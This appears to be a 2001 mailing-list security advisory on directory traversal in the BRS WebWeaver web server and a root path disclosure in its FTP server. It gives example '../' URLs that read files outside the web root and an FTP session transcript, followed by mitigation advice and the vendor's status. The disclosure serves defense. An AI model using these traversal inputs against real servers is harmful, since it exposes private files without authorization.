Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
From: joetestaHUSHMAIL.COM
Date: Sat Apr 28 2001 - 18:57:20 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ----- Begin Hush Signed Message from joetestahushmail.com -----

    Vulnerabilities in BRS WebWeaver


    BRS WebWeaver v0.63 is a combined ftp and web server available from
    http://bsoutham.home.dhs.org. Vulnerabilities exist in the web
    server which allow remote users to break out of the web root using
    relative paths (ie: '..', '...'). In addition, the ftp server
    can be made to disclose the physical path of the ftp root.


    The following URLs demonstrate the problem with the web server:

            http://localhost/syshelp/../[any file outside the web root]
            http://localhost/sysimages/../[any file outside the web root]
            http://localhost/scripts/../[any file outside the web root]

    The following is an illustration of the problem with the ftp server:

    >ftp localhost
    Connected to xxxxxxxxxxxx.rh.rit.edu.
    220 BRS WebWeaver FTP Server ready.
    User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
    331 Password required for jdog.
    230 User jdog logged in.
    ftp> cd *
    250 CWD command successful. "/*/" is current directory.
    ftp> ls
    200 Port command successful.
    150 Opening data connection for directory list.
    c:\windows\desktop\*\*.* not found
    226 File sent ok
    ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.


    The web server root traversal vulnerabilities can be prevented by removing
    all user-defined aliases (ie: 'syshelp', 'sysimages') as well as the
    ISAPI/CGI alias (ie: 'scripts'). There is no solution for the ftp root
    disclosure vulnerability.

        Vendor Status

    Blaine R Southam was contacted via <bsouthaminame.com> on
    Saturday, April 21, 2001. No reply was received.

        - Joe Testa

    e-mail: joetestahushmail.com
    web page: http://hogs.rit.edu/~joet
    AIM: LordSpankatron

    ----- Begin Hush Signature v1.3 -----
    ----- End Hush Signature v1.3 -----

    This message has been signed with a Hush Digital Signature.
    To verify the signature, please go to www.hush.com/tools

    Free, encrypted, secure Web-based email at www.hushmail.com